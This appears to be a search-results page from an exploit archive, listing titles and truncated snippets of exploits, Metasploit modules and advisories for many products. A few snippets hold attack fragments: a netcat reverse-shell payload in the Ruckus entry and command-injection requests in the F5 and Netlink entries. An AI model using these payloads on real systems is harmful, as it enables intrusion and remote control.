50738 matches found
Lexmark Device Embedded Web Server Remote Code Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Lexmark Device Embedded Web Server RCE', 'Description' = %q A unauthenticated Remote Code Execution vulnerability exists in the embedded webserve...
Boxoft Audio Converter 2.3.0 Buffer Overflow
Exploit Title: Boxoft Audio Converter 2.3.0 - '.wav' Buffer Overflow SEH Discovery by: Luis Martinez Discovery Date: 2020-11-22 Vendor Homepage: http://www.boxoft.com/ Software Link: http://www.boxoft.com/audio-converter/a-pdf-bac.exe Tested Version: 2.3.0 Vulnerability Type: Local Buffer Overflo...
i-Panel Administration System 2.0 Cross Site Scripting
Exploit Title: i-Panel Administration System 2.0 - Reflected Cross-site Scripting XSS Date: 04.10.2021 Exploit Author: Forster Chiu Vendor Homepage: https://www.hkurl.com Version: 2.0 Tested on: Chrome, Edge and Firefox CVE: CVE-2021-41878 Reference:...
Exchange Control Panel Viewstate Deserialization
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'bindata' class MetasploitModule 'Exchange Control Panel Viewstate Deserialization', 'Description' = %q This module exploits a .NET serialization vulnerability i...
Android Janus APK Signature Bypass
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core/payload/apk' class MetasploitModule "Android Janus APK Signature bypass", 'Description' = %q This module exploits CVE-2017-13156 in Android to install ...
ChurchCRM 4.4.5 SQL Injection
Title: ChurchCRM 4.4.5 SQLi session hijacking L2 Author: nu11secur1ty Date: 05.11.2022 Vendor: https://churchcrm.io/ Software: https://github.com/ChurchCRM/CRM Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-31325 Description: There is a SQL Injection PWN cookie...
Golden FTP Server 4.70 Buffer Overflow
Golden FTP Server 4.70 - 'PASS' Buffer Overflow 2 Author: 1F98D Original Authors: Craig Freyman cd1zz and Gerardo Iglesias Galvan iglesiasgg Tested on Windows 10 x64 A buffer overflow exists in GoldenFTP during the authentication process. Note that the source ip address of the user performing the...
Visual Studio Code Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Visual Studio vsix Extension Exec', 'Description' = %q Creates a vsix file which can be installed in Visual Studio Code as an extension. At...
Simple Online Men's Salon Management System 1.0 SQL Injection
MSMS Vendor Description The password parameter on MSMS 1.0 appears to be vulnerable to SQL injection attacks. The predictive tests of this application interacted with that domain, indicating that the injected SQL query was executed. The attacker can retrieve all authentication and information abo...
Altus Sistemas de Automacao Products CSRF / Command Injection / Hardcoded Credentials
SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Multiple Critical Vulnerabilities product: Multiple Altus Sistemas de Automacao products: Nexto NX30xx Series Nexto NX5xxx Series Nexto Xpress XP3xx Series Hadron Xtorm...
Lucee Administrator imgProcess.cfm Arbitrary File Write
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Lucee Administrator imgProcess.cfm Arbitrary File Write', 'Description' = %q This module exploits an arbitrary file write in Lucee Administrator'...
LifeRay 7.2.1 GA2 Cross Site Scripting
Exploit Title: LifeRay 7.2.1 GA2 - Stored XSS Date: 10/05/2020 Exploit Author: 3ndG4me Vendor Homepage: https://www.liferay.com/ Software Link: https://www.liferay.com/ Version: 7.1.0 - 7.2.1 GA2 REQUIRED Tested on: Debian Linux CVE : CVE-2020-7934 Public Exploit/Whitepaper:...
Grocy Household Management Solution 2.7.1 Cross Site Scripting
Exploit Author: Simran Sankhala Vendor Homepage: https://berrnd.de/ Software Link: https://github.com/grocy/grocy Version: 2.7.1 Tested on: Kali Linux 2020.3 CVE ID Alloted : CVE-2020-25454 Proof Of Concept: grocy household management solution v2.7.1, allows stored XSS , via Add recipe module, th...
Social Networking Site SQL Injection
Exploit Title: Social Networking Site - Authentication Bypass SQli Date: 2020-11-17 Exploit Author: gh1mau Email: [email protected] Team Members: Capt'N, muzzo, chaos689 | https://h0fclanmalaysia.wordpress.com/ Vendor Homepage:...
Vehicle Parking Management System 1.0 SQL Injection
Exploit Title: Vehicle Parking Management System 1.0 - Authentication Bypass Date: 2020-07-16 Exploit Author: gh1mau Team Members: Capt'N,muzzo,chaos689 | https://h0fclanmalaysia.wordpress.com/ Vendor Homepage: https://phpgurukul.com/vehicle-parking-management-system-using-php-and-mysql/ Software...
TypeORM 0.3.7 Information Disclosure
I found what I think is a vulnerability in the latest typeorm 0.3.7. TypeORM v0.3 has a new findOneBy method instead of findOneById and it is the only way to get a record by id Sending undefined as a value in this method removes this parameter from the query. This leads to the data exposure. For...
Microsoft SharePoint Server 16.0.10372.20060 Server-Side Request Forgery
Exploit Title: Microsoft SharePoint Server 16.0.10372.20060 - 'GetXmlDataFromDataSource' Server-Side Request Forgery SSRF Date: 09 Jun 2021 Exploit Author: Alex Birnberg Software Link: https://www.microsoft.com/en-us/download/details.aspx?id=57462 Version: 16.0.10372.20060 Tested on: Windows Serv...
HFS Http File Server 2.3m Build 300 Buffer Overflow
Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/HFS-HTTP-FILE-SERVER-v2.3-REMOTE-BUFFER-OVERFLOW-DoS.txt + twitter.com/hyp3rlinx + ISR: ApparitionSec Vendor www.rejetto.com Product HFS Http File Server v2.3m Build 300...
Palo Alto Networks GlobalProtect Local Privilege Escalation
SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Local Privilege Escalation via MSI installer product: Palo Alto Networks GlobalProtect vulnerable version: 5.1.x, 5.2.x, 6.0.x, 6.1.x, =6.2.5, all other versions are not...
Microsoft IIS HTTP Internal IP Disclosure
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Microsoft IIS HTTP Internal IP Disclosure', 'Description' = %q Collect any leaked internal IPs by requesting commonly redirected locations from...
Apache Flink 1.9.x Shell Upload
!/usr/bin/env python3 coding: utf-8 Exploit Title: Apache Flink 1.9.x - File Upload RCE Unauthenticated Google Dork: None Date: 2020.11.01 Exploit Author: bigger.wing Vendor Homepage: https://flink.apache.org/ Software Link: https://flink.apache.org/downloads.html Version: 1.9.x Tested on:...
Wondershare Dr.Fone 11.4.10 Insecure Permissions
Exploit Title: Wondershare Dr.Fone 11.4.10 - Insecure File Permissions Date: 04/25/2022 Exploit Author: AkuCyberSec https://github.com/AkuCyberSec Vendor Homepage: https://drfone.wondershare.com/ Software Link: https://download.wondershare.com/drfonefull3360.exe Version: 11.4.10 Tested on: Window...
Microsoft Office Word MSHTML Remote Code Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Microsoft Office Word Malicious MSHTML RCE', 'Description' = %q This module creates a malicious docx file that when opened in Word on a vulnerabl...
Online Job Portal In PHP/PDO 1.0 SQL Injection
Title: online job portal phppdo v1.0 - SQL injection Exploit Author: Mohamed Elobeid 0b3!d Date: 2020-08-21 Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html Software Link:...
ElkarBackup 1.3.3 Cross Site Scripting
Exploit Title: ElkarBackup 1.3.3 - 'Policyname' and 'PolicyDescription' Stored Cross-site Scripting Date: 2020-08-22 Exploit Author: Vyshnav NK Vendor Homepage: https://www.elkarbackup.org/ Software Link: https://github.com/elkarbackup/elkarbackup/wiki/Installation Version: 1.3.3 Tested on: Linux...
Best Support System 3.0.4 Cross Site Scripting
Exploit Title: Best Support System 3.0.4 - 'ticketbody' Persistent XSS Authenticated Google Dork: "Powered By Best Support System" Date: 2020-08-23 Exploit Author: Ex.Mi https://ex-mi.ru Vendor: Appsbd https://appsbd.com Software Version: 3.0.4 Software Link:...
Ruckus IoT Controller 1.5.1.0.21 Remote Code Execution
Product: Ruckus IoT Controller Ruckus vRIoT Version: &1|nc "+lhost+" "+lport+" /tmp/f; " return payload def generateMagicToken: encdecmethod = 'utf-8' salt = 'nplusServiceAuth' salt = salt.encode"utf8" strkey = 'serviceN1authent' strtoenc = 'TlBMVVMx' return encryptencdecmethod, salt, strkey,...
Joomla! paGO Commerce 2.5.9.0 SQL Injection
Exploit Title: Joomla! paGO Commerce 2.5.9.0 - SQL Injection Authenticated Date: 2020-08-21 Exploit Author: Mehmet Kelepçe / Gais Cyber Security Author ID: 8763 Vendor Homepage: https://www.corephp.com/ Software Link: https://www.corephp.com/joomla-products/pago-commerce Version: 2.5.9.0 Tested o...
OpenCTI 3.3.1 Cross Site Scripting / Directory Traversal
Exploit Title: OpenCTI 3.3.1 - Directory Traversal Date: 2020-03-05 Exploit Author: Raif Berkay Dincel Vendor Homepage: www.opencti.io/ Software https://github.com/OpenCTI-Platform/opencti/releases/tag/3.3.1 Version: 3.3.1 CVE-ID: N/A Tested on: Linux Mint / Windows 10 Vulnerabilities Discovered...
Apache ActiveMQ 5.11.1 / 5.13.2 Directory Traversal / Command Execution
I have recently been playing with Apache ActiveMQ, and came across a simple but interesting directory traversal flaw in the fileserver upload/download functionality. I have only been able to reproduce this on Windows, i.e. where "" is a path delimiter. An attacker could use this flaw to upload...
Boomerang Parental Control App Cross Site Scripting / Privilege Escalation
SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Stored XSS & Privilege Escalation product: Boomerang Parental Control App vulnerable version: =13.83 only issue 1, rest not fixed CVE number: CVE-2023-36620, CVE-2023-366...
OX App Suite 7.10.6 Cross Site Scripting / SSRF / Resource Consumption
Product: OX App Suite Vendor: OX Software GmbH Internal reference: OXUIB-1654 Vulnerability type: Cross-Site Scripting CWE-80 Vulnerable version: 7.10.6 and earlier Vulnerable component: frontend Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.10.5-rev37, 7.10.6-rev...
Backdoor.Win32.WinShell.40 Code Execution
Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/c98e23742807f3cb5a095f34e0eb0e52.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.WinShell.40 Vulnerability: Unauthenticated Remote Command Execution Description: The...
Openfire 4.6.0 Cross Site Scripting
Exploit Title: Openfire 4.6.0 - 'path' Stored XSS Date: 20201209 Exploit Author: j5s Vendor Homepage: https://github.com/igniterealtime/Openfire Software Link: https://www.igniterealtime.org/downloads/ Version: 4.6.0 POST /plugins/nodejs/nodejs.jsp HTTP/1.1 Host: 192.168.137.137:9090 User-Agent:...
Microsoft Windows Remote Desktop BlueKeep Denial Of Service
import socket, sys, struct from OpenSSL import SSL from impacket.structure import Structure I'm not responsible for what you use this to accomplish and should only be used for education purposes Could clean these up since I don't even use them class TPKTStructure: commonHdr = 'Version','B=3',...
Intel Rapid Storage Technology User Interface And Driver 15.9.0.1015 DLL Hijacking
Hi @ll, the executable installer of the Intelr Rapid Storage Technology Intelr RST User Interface and Driver, version 15.9.0.1015 LATEST for Windows 7, released 11/14/2017, available from via is SURPRISE! vulnerable! CVSS score: 7.5/HIGH CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H See Intel's...
Sumatra PDF 3.5.2 DLL Hijacking
Exploit Title: Sumatra PDF 3.5.2 DLL Hijacking Date: 06.02.2024 Exploit Author: Ravishanka Silva Vendor Homepage: https://www.sumatrapdfreader.org/free-pdf-reader Software Link: https://www.sumatrapdfreader.org/download-free-pdf-viewer Version: 3.5.2 Tested on: Windows 10, Windows 11 CVE :...
mPDF 7.0 Local File Inclusion
Exploit Title: mPDF 7.0 - Local File Inclusion Google Dork: N/A Date: 2022-07-23 Exploit Author: Musyoka Ian Vendor Homepage: https://mpdf.github.io/ Software Link: https://mpdf.github.io/ Version: CuteNews Tested on: Ubuntu 20.04, mPDF 7.0.x CVE: N/A !/usr/bin/env python3 from urllib.parse impor...
F5 BIG-IP Remote Code Execution
F5 BIG-IP RCE exploitation CVE-2022-1388 POST 1: POST /mgmt/tm/util/bash HTTP/1.1 Host: :8443 Authorization: Basic YWRtaW46 Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: 0 "command": "run" , "utilCmdArgs": " -c 'id' " curl commandliner: $ curl -i -s -k -X $'POST' -H $'Host: :8443' -H...
Sophos UTM WebAdmin SID Command Injection
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Sophos UTM WebAdmin SID Command Injection', 'Description' = %q This module exploits an SID-based command injection in Sophos UTM's WebAdmin...
WordPress wpDiscuz 7.0.4 Shell Upload
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'WordPress wpDiscuz Unauthenticated File Upload Vulnerability', 'Description' = %q This module exploits an arbitrary file upload in the WordPress...
Netlink GPON Router 1.0.11 Remote Code Execution
Exploit Title: Netlink GPON Router 1.0.11 - Remote Code Execution Date: 2020-03-17 Exploit Author: shellord Vendor Homepage: https://www.netlink-india.com/ Version: 1.0.11 Tested on: Windows 10 CVE: N/A Exploit : curl -L -d "targetaddr=;ls /&waninf=1INTERNETRVID154"...
TestLink 1.9.19 Cross Site Scripting
Exploit Title: TestLink 1.9.19 - Persistent Cross-Site Scripting Date: 2019-11-20 Exploit Author: Milad Khoshdel Software Link: http://testlink.org/ Version: TestLink 1.9.19 Tested on: Linux Apache/2 PHP/7.3.11 ========= Vulnerable Pages: ========= Persistent --...
AV Arcade Pro 5.4.3 Cookie Manipulation
========================================== AV Arcade Pro 5.4.3 By pass Seting Exploit ========================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=0 0 . .--. .--. .---. . 1 1 .'| / | 0 0 | --: --: / .-.| .-. . . 1 1 | / | | | 0 0 '---' --' --' ' -'--'---| 1 1 ;...
LiquidFiles 3.5.13 Privilege Escalation
=============================================================================== title: LiquidFiles Privilege Escalation product: LiquidFiles v3.5.13 vulnerability type: Privilege Escalation severity: Medium CVSSv3 score: 6.7 CVSSv3 vector: AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L found: 2021-10-29 by:...
Backdoor.Win32.VB.afu Insecure Transit
Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/c6ba7fcb9eb9bdd7e081e2e84e784dcbB.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.VB.afu Vulnerability: Insecure Transit Password Disclosure Description: The malware...
Online Matrimonial Project 1.0 Remote Code Execution
Exploit Title: Online Matrimonial Project 1.0 - Authenticated Remote Code Execution Exploit Author: Valerio Alessandroni Date: 2020-10-07 Vendor Homepage: https://projectworlds.in/ Software Link: https://projectworlds.in/free-projects/php-projects/online-matrimonial-project-in-php/ Source Link:...
WordPress Wibar Theme 1.1.8 Cross Site Scripting
Exploit Title: Wordpress Theme Wibar 1.1.8 - 'Brand Component' Stored Cross Site Scripting Date: 11/27/2020 Exploit Author: Ilca Lucian Florin Vendor Homepage: http://demo.themeftc.com/wibar Software Link: https://themeforest.net/item/wibar-responsive-woocommerce-wordpress-theme/20994798 Version:...
Lot Reservation Management System 1.0 Cross Site Scripting
Exploit Title: lot reservation management system 1.0 - Stored Cross Site Scripting Date: 2020-10-22 Exploit Author: Ankita Pal Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html Software Link:...
OpenNMS Horizon 31.0.7 Remote Command Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'OpenNMS Horizon Authenticated RCE', 'Description' = %q This module exploits built-in functionality in OpenNMS Horizon in order to execute arbitra...